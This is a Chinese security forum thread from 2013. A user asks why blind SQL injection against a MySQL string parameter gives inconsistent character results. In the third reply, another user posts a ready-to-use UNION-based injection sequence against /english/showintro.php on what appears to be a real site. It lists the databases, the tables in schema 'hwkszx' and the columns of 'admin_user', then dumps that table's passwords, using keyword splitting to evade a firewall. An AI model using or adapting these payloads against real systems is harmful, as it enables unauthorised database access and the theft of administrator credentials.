首页
社区
课程
招聘
[求助]为什么sql注入会随即出现结果
发表于: 2013-6-18 17:28 1867

[求助]为什么sql注入会随即出现结果

2013-6-18 17:28
1867
注入类型是String+mysql的,问题是同样的注有时显示正确有时显示错误,具体来说

1.在测试长度的时候,长度出出现多种情况

2.在测试某一位置的字符时,可出现多种情况

经过每个位置2000次的统计,可得到前4个位置的字符如下:
------position:1----------
position:1   data:c
position:1   data:i
position:1   data:k
------position:2----------
position:2   data:c
position:2   data:e
position:2   data:s
position:2   data:z
------position:3----------
position:3   data:b
position:3   data:m
position:3   data:t
position:3   data:z
------position:4----------
position:4   data:c
position:4   data:x

一头雾水啊,求大神指教~~

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
用union啊~
2013-6-19 00:04
0
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
列数据库:
/english/showintro.php?ID=0'+uni/删掉/on+sel/删掉/ect+1,schema_name,3+FROM+information_schema.schemata+limit+1,1+--+

列表:
/english/showintro.php?ID=0'+uni/删掉/on+sel/删掉/ect+1,table_name,3+FROM+information_schema.tables+WHERE+table_schema='hwkszx'+limit+1,1+--+

列字段:
/english/showintro.php?ID=0'+uni/删掉/on+sel/删掉/ect+1,column_name,3+FROM+information_schema.columns+WHERE+table_name='admin_user'+limit+1,1+--+

列数据
/english/showintro.php?ID=0'+uni/删掉/on+sel/删掉/ect+1,password,3+FROM+admin_user+--+

帖子有union,select就给看雪的防火墙拦了  楼主你怎么就能完整的发出来  纳闷了...
2013-6-19 00:07
0
雪    币: 516
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
印象   3楼市开了magic box的用法吧?
2013-6-20 08:24
0
游客
登录 | 注册 方可回帖
返回
//